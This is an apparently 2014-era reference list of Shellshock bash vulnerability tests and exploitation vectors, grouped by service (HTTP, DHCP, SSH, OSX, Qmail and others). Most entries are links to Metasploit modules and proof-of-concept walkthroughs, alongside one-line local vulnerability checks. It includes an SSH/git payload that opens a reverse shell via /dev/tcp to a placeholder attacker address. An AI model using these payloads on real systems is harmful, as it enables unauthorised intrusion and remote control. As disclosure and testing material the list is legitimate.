Command Line (Linux, OSX, and Windows via Cygwin)
- bashcheck – script to test for the latest vulns
CVE-2014-6271
- env X='() { :; }; echo “CVE-2014-6271 vulnerable”‘ bash -c id
CVE-2014-7169
will create a file named echo in cwd with date in it, if vulnerable
- env X='() { (a)=>\’ bash -c “echo date”; cat echo
CVE-2014-7186
- bash -c ‘true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF’ || echo “CVE-2014-7186 vulnerable, redir_stack”
CVE-2014-7187
- (for x in {1..200} ; do echo “for x$x in ; do :”; done; for x in {1..200} ; do echo done ; done) | bash || echo “CVE-2014-7187 vulnerable, word_lineno”
CVE-2014-6278
- () { _; } >_[$($())] { echo hi mom; id; }
CVE-2014-6277
will segfault if vulnerable
- () { x() { _; }; x() { _; } <<a; }
- Additional discussion on fulldisclosure: http://seclists.org/fulldisclosure/2014/Oct/9
IBM z/OS –
HTTP
- Metasploit Exploit Module Apache MOD_CGI – https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb
- HTTP Header Polution by @irsdl – http://pastebin.com/QNkf7dYS
- HTTP CGI-BIN – http://pastebin.com/166f8Rjx
- cPanel – http://blog.sucuri.net/2014/09/bash-vulnerability-shell-shock-thousands-of-cpanel-sites-are-high-risk.html
- Digital Alert Systems DASDEC – http://seclists.org/fulldisclosure/2014/Sep/107
- F5 – https://twitter.com/securifybv/status/515035044294172673
- Invisiblethreat.ca – https://www.invisiblethreat.ca/2014/09/cve-2014-6271/
- Commandline version – https://gist.github.com/mfadzilr/70892f43597e7863a8dc
- User-Agent based walkthrough with LiveHTTPHeaders – http://www.lykostech.net/lab-time-exploiting-shellshock-bash-bug-virtual-server/
- User-Agent based walkthrough with Burp – http://oleaass.com/shellshock-proof-of-concept-reverse-shell/
- User-Agent via Curl with test server – http://shellshock.notsosecure.com/
- User-Agent based but supports Tor and Socks5 (Python) –https://github.com/lnxg33k/misc/blob/master/shellshock.py
- User-Agent based in Ruby – https://github.com/securusglobal/BadBash
- Header based simple scanner using sleep with multithread support –https://github.com/gry/shellshock-scanner
Phusion Passenger
DHCP
- Trusted sec exploitation via Tftpd32 – https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/
- Metasploit Exploit Module – https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/dhcp/bash_environment.rb
- Metasploit Auxiliary Module – https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/dhclient_bash_env.rb
- Perl Script – http://pastebin.com/S1WVzTv9
- using a Wi-Fi pineapple to force people to join the network – http://d.uijn.nl/?p=32
SSH
- Stack Overflow – http://unix.stackexchange.com/questions/157477/how-can-shellshock-be-exploited-over-ssh
- SSH ForcedCommand – https://twitter.com/JZdziarski/status/515205581226123264
- SendEnv: LC_X='() { :; }; echo vulnerable’ ssh [email protected] -o SendEnv=LC_X
- Gitolite – https://twitter.com/Grifo/status/515089986161766400
- $ ssh [email protected] ‘() { ignore;}; /bin/bash -i >& /dev/tcp/REVERSESHELLIP/PORT 0>&1’
- (necessary to have a git account on the server)
OSX
- Priv Escalation via VMware Fusion – https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/local/vmware_bash_function_root.rb
- Fix: http://support.apple.com/kb/DL1769
SIP
- SIP Proxies: https://github.com/zaf/sipshock
Qmail
- Detailed walkthrough – http://marc.info/?l=qmail&m=141183309314366&w=2
- Tweet from @ymzkei5 – http://twitter.com/ymzkei5/status/515328039765307392
Postfix
FTP
OpenVPN
- OpenVPN – https://news.ycombinator.com/item?id=8385332
- PoC Walkthrough by @fj33r – http://sprunge.us/BGjP
Oracle
TMNT
Hand
- Via @DJManilaIce – http://pastie.org/9601055
Speculation:(Non-confirmed possibly vulnerable)